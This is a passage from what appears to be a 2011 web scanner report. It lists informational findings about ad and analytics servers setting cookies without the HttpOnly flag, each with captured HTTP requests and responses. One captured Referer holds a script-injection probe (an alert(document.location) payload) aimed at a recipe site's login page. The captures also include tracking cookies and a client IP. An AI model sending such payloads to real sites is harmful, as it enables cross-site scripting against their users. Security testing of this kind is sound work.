The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316265127233_137611811_as3107_imp/vew?q=H4sIAAAAAAAAAFWQMU_EMAyF_4pjx4kjZffUAQYk0LViZEKkXHWMVWlQBW3vr-OeWNjyLL_3vvhhe_zZyvCR7_b3YRuvVV_LsOQnTi4IBGqCJ2JiaW6T6FwTKdoD5KRLzYBg2gMFQuwAQwRIAN3YI7jQLWvR8mVbDiJ4ChGFtc_urwWYJUamBjwmNF9zTBKITTiyFzlarpdc9_PnNk_bMn3rkImTZ4YoAULQpbcgtAQSOUyhudUFD4ZCcijb9AkjsD-U-EhCgogn3cplzuSM2EkHoXOuc6mDpOP5oGZjAB8sW0tGl_Qtz5N9mzEZmw-tzsWkJScWn1qdxrW81OxJnLG0uu513vLzfat1Knlfa6v7vObr0vfj1dy9ub0kF807jybs2JiSVevQ_7-u_gK9m_7CrAEAAA==&act=vew&idx=[0]&rnd=2023178134&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316265127233_137611811_as3107_imp|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316265127425_137664789_as3101_vew|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 13:12:07 GMT; Path=/tase
Date: Sat, 17 Sep 2011 13:12:07 GMT


12.7. http://amch.questionmarket.com/adsc/d913131/10/400008095899/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d913131/10/400008095899/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d913131/10/400008095899/decide.php?ord=1316288110 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:37 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 14:37:36 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-17d1a66403974a1bf62d24ec5_43741102-3-54_400008095899-10-1; expires=Wed, 07 Nov 2012 06:37:37 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_913131-G*?|M-0; expires=Wed, 07-Nov-2012 06:37:37 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.8. http://amch.questionmarket.com/adsc/d913132/5/400008029877/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d913132/5/400008029877/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d913132/5/400008029877/decide.php?ord=1316282753 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:05:11 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 13:05:10 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1; expires=Wed, 07 Nov 2012 05:05:11 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0_913132-c5?|M-0; expires=Wed, 07-Nov-2012 05:05:11 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.9. http://amch.questionmarket.com/adsc/d917547/10/43064321/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d917547/10/43064321/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d917547/10/43064321/decide.php?ord=1316287903 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://answerology.delish.com/index.aspx?template=login.ascx&nextTemplate=home.ascxe81bd%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E384de482b57
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:35:52 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 14:35:51 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1%5D%5D%3E%3E_43741102-3-7_43064321-10-1; expires=Wed, 07 Nov 2012 06:35:52 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_924563-`#?|M-0_913131-y'?|M-0_917547-Q#?|M-x3; expires=Wed, 07-Nov-2012 06:35:52 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.10. http://amch.questionmarket.com/adsc/d924563/3/43741102/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d924563/3/43741102/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d924563/3/43741102/decide.php?ord=1316287868 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0_913132-c5?|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:34:02 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a203
Set-Cookie: CS1=deleted; expires=Fri, 17-Sep-2010 14:34:01 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-2_400008095899-10-1; expires=Wed, 07-Nov-2012 06:34:02 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_913131-y'?|M-0_924563-`#?|M-(1; expires=Wed, 07-Nov-2012 06:34:02 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.11. http://amch.questionmarket.com/adsc/d924563/3/43741105/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d924563/3/43741105/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d924563/3/43741105/decide.php?ord=1316281820 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:02:56 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 13:02:55 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-2_924563-1-4; expires=Wed, 07 Nov 2012 05:02:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-D9; expires=Wed, 07-Nov-2012 05:02:56 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.12. http://amch.questionmarket.com/adscgen/dynamiclink.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:40 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: LP=1316270260; expires=Wed, 21 Sep 2011 18:37:40 GMT; path=/; domain=.questionmarket.com
Content-Length: 875
Content-Type: text/html

if (!window.DL_already_ran) (function(){
var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_
...[SNIP]...

12.13. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/surv_lastpage_disq.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adscgen/surv_lastpage_disq.php?p1=Click+to+Close&p2=Continue+to+your+destination HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:41:40 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Set-Cookie: veranda_ses=deleted; expires=Fri, 17 Sep 2010 14:41:39 GMT; path=/; domain=.questionmarket.com
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 354
Content-Type: text/html

(function(){
if (self==top) {
   if (window.opener)
       document.write('<a href="javascript:window.close()">Click to Close</a>');
} else {
       document.write('<a href="http://amch.questionmarket.com/adscgen
...[SNIP]...

12.14. http://amch.questionmarket.com/surveyf/nav.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /surveyf/nav.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /surveyf/nav.php?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:46 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Cache-Control: private, must-revalidate
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: LP=1316270266; expires=Wed, 21 Sep 2011 18:37:46 GMT; path=/; domain=.questionmarket.com
Content-Length: 3840
Content-Type: text/html; charset=utf-8

<html>
<head>
<style>
body {margin:0; }

table.outersurveybar {border-top:1px solid #808080; border-bottom:1px solid #999999; background-color:#B2B2B2; }
table.outersurveybar td {border-top:1px solid
...[SNIP]...

12.15. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1316264640.321,wait-%3E10000,&1316282687360 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&; BMX_G=method->-1,ts->1316264639; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:09:56 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

12.16. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:03:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:03:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1316264639; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28160

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C
...[SNIP]...

12.17. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

